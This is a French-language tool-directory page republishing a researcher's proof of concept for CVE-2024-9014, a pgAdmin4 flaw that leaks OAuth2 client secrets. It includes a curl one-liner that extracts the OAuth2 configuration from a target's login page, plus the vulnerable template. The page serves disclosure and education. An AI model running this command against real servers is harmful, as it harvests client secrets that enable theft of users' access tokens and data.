Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-9014 — Pgadmin4 Exposition d'informations sensibles | Kitploit
Outils/GitHubGitHub/eqstlab/cve-2024-9014
Analyse des VulnérabilitésExploitationCollecte d'InformationsSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubeqstlab/cve-2024-9014

CVE-2024-9014

Pgadmin4 Exposition d'informations sensibles

Voir le dépôt
81il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

This article est un article de recherche publié par EQSTLab.

CVE-2024-9014

★ CVE-2024-9014 PoC d'exposition d'informations sensibles ★

Description

CVE-2024-9014 : Exposition d'informations sensibles dans pgAdmin4

description : les versions 8.11 et antérieures de pgAdmin sont vulnérables à une faille de sécurité dans l'authentification OAuth2. Cette vulnérabilité permet à un attaquant d'obtenir potentiellement l'identifiant et le secret du client, conduisant à un accès non autorisé aux données utilisateur.

PoC

Commande

root@kitploit:~
curl [URL_TO_TEST]/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'

Exemple

root@kitploit:~
curl http://localhost:8000/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'

Sortie

pgadmin4-8.9 et pgadmin4-8.12 alt text

Analyse

Point vulnérable (pgadmin/templates/security/login_user.html)

À ce stade, la variable config.OAUTH2_CONFIG renvoie les fichiers de configuration OAuth2, y compris OAUTH2_CLIENT_ID et OAUTH2_CLIENT_SECRET.

root@kitploit:~
{% set page_name = 'login_user' %}
{% set user_language = request.cookies.get('PGADMIN_LANGUAGE') or 'en' %}
{% set ns = namespace(langOptions=[]) %}
{% for key, lang in config.LANGUAGES.items() %}
{% set _ = ns.langOptions.append({'value': key, 'label': lang}) %}
{% endfor %}
{% set page_props = {
    'userLanguage': user_language,
    'langOptions': ns.langOptions,
    'forgotPassUrl': url_for('browser.forgot_password'),
    'loginUrl': url_for('authenticate.login'),
    'csrfToken': csrf_token(),
    'authSources': config.AUTHENTICATION_SOURCES,
    'authSourcesEnum': {
        'OAUTH2': config.OAUTH2,
        'KERBEROS': config.KERBEROS,
    },
    'oauth2Config': config.OAUTH2_CONFIG,
    'loginBanner': config.LOGIN_BANNER|safe
} %}
{% extends "security/render_page.html" %}


Correctif

alt text

Scénario

Compromission d'informations privées

Identifier et protéger les paramètres OAuth secrets est très important. Alors que “client_id” peut être divulgué en toute sécurité, divulguer “client_secret” présente un risque significatif. Si le client_secret est compromis, un attaquant peut exploiter l'identité et la confiance de l'application pour voler le “access token” de l'utilisateur ainsi que ses informations personnelles.

Avertissement

Ce dépôt n'est pas destiné à exposer des informations sensibles relatives à CVE-2024-9014. Ce projet a pour but d'aider les personnes à apprendre en quoi consiste cette vulnérabilité, et peut-être à tester leurs propres applications.

EQST Insight

Nous publions des analyses de CVE et de malwares une fois par mois. Si vous êtes intéressé, veuillez suivre les liens ci-dessous pour consulter nos publications. https://www.skshieldus.com/eng/business/insight.do

Référence

https://nvd.nist.gov/vuln/detail/CVE-2024-9014

Télécharger l’outil